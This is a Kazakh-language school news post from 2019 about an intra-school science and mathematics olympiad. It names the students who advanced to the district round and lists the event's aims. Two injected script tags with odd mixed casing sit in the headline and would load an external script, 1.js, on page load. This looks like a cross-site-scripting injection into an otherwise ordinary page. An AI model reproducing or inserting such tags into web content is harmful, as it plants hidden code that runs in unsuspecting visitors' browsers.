Жаратылыстану-математикалық бағыт бойынша мектепішілік олимпиада өткізілді.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
18.10.2019
Әр баланың жеке қабілетін анықтап, шығармашылық бағытта жан-жақты дамыту, оны сол бағытта жетелеу-ұстаз парызы, бүгінгі күннің басты талабы. Осыған орай біздің мектепте де жаратылыстану-математикалық бағыт бойынша оқушыларға арналған пән олимпиадасы өткізілді. Пән олимпиадасы – оқушы білімін саралайтын сынақ. Мектепішілік пән олимпиадасы оқушылардың білім деңгейлерін анықтаумен шектелмей, олардың оқуға деген мотивациясын ояту, танымдық қабілеттерін арттыру мақсатында өткізілді. Одимпиадаға жалпы 22 оқушы қатысты. Олимпиада қорытындысы бойынша математика пәнінен Қасымбеков Мұрат, Ерік Арғын, Рахымғали Ағыбай. физика пәнінен Омарғали Гүлжамал, Ұлан Ақбота, биология пәнінен Ибрашева Жасмина, химия пәнінен Абсаметова Алдияр, Шахманова Мейрамгүл аудандық кезенге өтті.
Мектептегі олимпиаданың негізгі мақсаты:
-оқушының ой-өрісін кеңейту;
-оқушының пәнге қызығушылығын дамыту;
-мектепішілік, аудандық олимпиадаларда оқушының өзін көрсетуге дайындау, оқушымен жеке жұмыс жүргізуді ұйымдастыру.
Аканова А.